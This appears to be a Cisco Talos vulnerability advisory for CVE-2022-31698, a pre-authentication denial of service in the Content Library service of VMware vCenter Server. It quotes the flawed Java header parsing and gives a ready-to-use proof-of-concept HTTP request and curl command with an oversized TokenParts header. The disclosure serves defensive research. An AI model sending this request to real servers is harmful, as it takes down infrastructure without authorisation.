CVE-2022-31698
A denial of service vulnerability exists in the Content Library functionality of VMware vCenter Server 6.5 Update 3t. A specially-crafted HTTP header can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
VMware vCenter Server 6.5 Update 3t
vCenter Server - https://www.vmware.com/products/vcenter-server.html
8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-834 - Excessive Iteration
VMware vCenter Server is a platform that enables centralized control and monitoring of all virtual machines and ESXi hypervisors in a vSphere deployment.
A pre-authentication denial-of-service (DoS) vulnerability exists in the resourcebundle handler of the cls (Content Library) service.
Let us take a look at the vulnerable part of the code. Following the implementation of the “/cls/resourcebundle/*” handler, at some point we reach code located in the “SsoAuthenticatedFileStreamServlet.java” file:
```
Line 45 protected void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) throws ServletException {
Line 46   try {
Line 47     if (logger.isDebugEnabled())
Line 48       logger.debug(String.format("doGet: Entering (%s)", new Object[] { httpServletRequest.getRequestURI() }), new Object[0]);
Line 49     if (this._ssoEnabled)
Line 50       try {
Line 51         byte[] payload = IOUtils.toByteArray((InputStream)httpServletRequest
Line 52             .getInputStream());
Line 53         SsoOverRestVerifierUtil.verifySecurityHeader(
Line 54             httpServletRequest,
Line 55             payload,
Line 56             Arrays.asList(this._stsTrustChain.getStsTrustChain()),
Line 57             300,
Line 58             3600);
Line 59       } catch (com.vmware.cis.services.common.sso.SsoOverRestVerifierUtil.SsoAuthException e) {
Line 60         logger.error((Throwable)e, "doGet: SSO verification failed for client " +
Line 61             getRemoteClientInfo(httpServletRequest), new Object[0]);
Line 62         httpServletResponse
Line 63             .setStatus(401);
Line 64         return;
Line 65       }
```
Going further into SsoOverRestVerifierUtil.verifySecurityHeader (com.vmware.cis.services.common.sso.SsoOverRestVerifierUtil.java):
```
Line 62 private static SamlToken verifySecurityHeaderImpl(HttpServletRequest request, byte[] extractedPayload, List<X509Certificate> certificates, int clockToleranceSecs, int maxRequestAgeSecs) throws SsoAuthException {
Line 63   try {
Line 64     AuthVerifier verifier = AuthVerifierFactory.instance(certificates.<X509Certificate>toArray(new X509Certificate[certificates.size()]), clockToleranceSecs, maxRequestAgeSecs);
Line 65     String[] authHeaders = parseSecurityHeader(request);
Line 66     SsoOverRestRequest reqParam = SsoOverRestHelper.createSsoOverRestRequest(request, extractedPayload);
```
Finally we reach the vulnerable function parseSecurityHeader:
```
Line 36 private static String[] parseSecurityHeader(HttpServletRequest request) {
Line 37   int parts = Integer.parseInt(request.getHeader("TokenParts"));
Line 38   String[] authHeaders = new String[parts];
Line 39   for (int i = 0; i < parts; i++)
Line 40     authHeaders[i] = request.getHeader("TokenPart" + i);
Line 41   return authHeaders;
Line 42 }
```
As you can see, the value of the TokenParts HTTP header is parsed as an integer without any validation. An attacker therefore controls both the number of loop iterations (lines 39-40) and the size of the array allocated at line 38. Because parseSecurityHeader runs as part of the SSO verification step inside doGet, before any authentication decision has been made, no credentials are needed to reach it.

A huge TokenParts value causes high memory and CPU usage on the vCenter Server (an int-sized value such as the one in the request below asks for an array of more than a billion references) and may result in a temporary denial of service.
REQ

```
GET /cls/resourcebundle/123 HTTP/1.1
Host: vcenter-linux.lab.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Pragma: no-cache
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Tokenparts: 1234445566
Tokenpart: AAAAA
```
CURL

```
curl -i -s -k -X $'GET' \
  -H $'Host: vcenter-linux.lab.local' \
  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0' \
  -H $'Accept: application/json, text/plain, */*' \
  -H $'Accept-Language: pl,en-US;q=0.7,en;q=0.3' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Pragma: no-cache' \
  -H $'Sec-Fetch-Dest: empty' \
  -H $'Sec-Fetch-Mode: cors' \
  -H $'Sec-Fetch-Site: same-origin' \
  -H $'Te: trailers' \
  -H $'Connection: close' \
  -H $'Tokenparts: 1234445566' \
  -H $'Tokenpart: AAAAA' \
  $'https://vcenter-linux.lab.local/cls/resourcebundle/123'
```
2022-08-08 - Vendor Disclosure
2022-12-08 - Vendor Patch Release
2022-12-13 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.